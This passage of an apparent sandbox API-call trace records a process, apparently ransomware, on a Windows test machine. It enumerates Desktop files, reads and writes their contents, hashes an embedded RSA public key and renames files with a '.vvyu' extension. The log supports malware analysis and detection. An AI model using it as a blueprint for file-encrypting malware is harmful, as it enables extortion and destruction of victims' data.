hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d20 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d80 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d98 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d38 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d08 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d68 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d98 | out: hHeap=0x620000) returned 1 [0195.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0195.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0195.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0195.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0195.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0195.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0195.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0195.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cd8 | out: hHeap=0x620000) returned 1 [0195.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cdddc8 | out: hHeap=0x620000) returned 1 [0195.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0195.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0195.713] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0195.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0195.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.714] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.715] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0195.715] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x12a2b, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x12a2b, lpOverlapped=0x0) returned 1 [0195.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0195.717] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x12a30, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.717] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.717] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0195.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0195.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0195.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.718] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0195.719] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.719] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.719] CloseHandle (hObject=0x568) returned 1 [0195.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0195.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0195.721] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0195.721] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YsVCZXV.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\3ysvczxv.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YsVCZXV.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\3ysvczxv.bmp.vvyu")) returned 1 [0195.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.722] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0195.725] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x407eb340, ftCreationTime.dwHighDateTime=0x1d8983a, ftLastAccessTime.dwLowDateTime=0x182d2600, ftLastAccessTime.dwHighDateTime=0x1d8a213, ftLastWriteTime.dwLowDateTime=0x182d2600, ftLastWriteTime.dwHighDateTime=0x1d8a213, nFileSizeHigh=0x0, nFileSizeLow=0xdcfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9eCWyh_E3fHJU.avi", cAlternateFileName="9ECWYH~1.AVI")) returned 1 [0195.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0195.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.726] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\9eCWyh_E3fHJU.avi") returned=".avi" [0195.726] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\9eCWyh_E3fHJU.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\9ecwyh_e3fhju.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.726] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=56573) returned 1 [0195.726] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.729] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xdcd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.729] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.731] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.732] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.732] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xdcfd, lpOverlapped=0x0) returned 1 [0195.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.733] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.733] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.733] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.735] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.735] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.735] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.735] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.735] GetLastError () returned 0x0 [0195.735] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.735] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.735] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.735] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.735] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.735] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.735] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xdd00) returned 0x2ea79b0 [0195.736] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.736] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.736] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdddc8 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cd8 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cdde10 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d20 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d38 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.737] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.737] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0195.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.737] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.738] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0195.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d80 [0195.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0195.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d38 [0195.738] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2d20 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d38 | out: hHeap=0x620000) returned 1 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d20 | out: hHeap=0x620000) returned 1 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.739] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d80 | out: hHeap=0x620000) returned 1 [0195.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.740] GetCurrentThreadId () returned 0x66c [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4b10 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.741] GetCurrentThreadId () returned 0x66c 